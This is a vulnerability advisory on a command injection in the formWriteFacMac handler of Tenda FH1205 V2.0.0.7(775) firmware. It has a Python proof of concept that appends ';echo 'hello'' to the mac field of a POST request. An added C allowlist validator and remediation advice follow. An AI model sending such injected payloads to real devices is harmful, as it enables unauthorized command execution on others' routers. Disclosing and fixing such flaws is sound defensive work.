Overview

Affected version

FH1205 V2.0.0.7(775)

Vulnerability details

In the Tenda FH1205 V2.0.0.7(775) firmware, we discovered a command injection vulnerability in the formWriteFacMac function, in the v2 parameter: the mac variable is passed directly to a doSystemCmd function, causing arbitrary command execution. A user-provided mac value can trigger this vulnerability.


POC

import requests

# Address of the test device
ip = "192.168.84.101"
url = "http://" + ip + "/goform/WriteFacMac"

# Benign marker command appended through the mac parameter
payload = ";echo 'hello'"

data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)

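The missing check, as an added example that is not the vendor's code or part of the original report: a strict allowlist validator for the mac value that a handler like formWriteFacMac could apply before the value gets anywhere near doSystemCmd. The names is_valid_mac and accept_mac_param are hypothetical, and the colon-separated MAC format is an assumption about what the parameter is meant to carry.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Return 1 only for exactly "XX:XX:XX:XX:XX:XX" (hex digits, ':' separators).
 * Anything else, including shell metacharacters such as ';', is rejected.
 * The expected format is an assumption; the report does not state it. */
int is_valid_mac(const char *s)
{
    if (s == NULL || strlen(s) != 17)
        return 0;
    for (size_t i = 0; i < 17; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}

/* Hypothetical stand-in for the request handler: copies the MAC into out and
 * returns 0 only when it is well formed, otherwise returns -1 so the caller
 * can refuse the request instead of building a command string from it. */
int accept_mac_param(const char *mac, char *out, size_t outlen)
{
    if (!is_valid_mac(mac) || outlen < 18)
        return -1;
    memcpy(out, mac, 18); /* 17 characters plus the terminating NUL */
    return 0;
}

int main(void)
{
    /* Constructed sample inputs: one well-formed MAC and the PoC payload. */
    const char *samples[] = { "00:11:22:AA:bb:Cc", ";echo 'hello'" };
    char buf[18];
    for (size_t i = 0; i < 2; i++)
        printf("%-20s -> %s\n", samples[i],
               accept_mac_param(samples[i], buf, sizeof buf) == 0
                   ? "accepted" : "rejected");
    return 0;
}
```

Validation of this kind is most robust when the command is also run without a shell (an argument vector passed to an exec-style call), so that a validation gap does not turn into command execution.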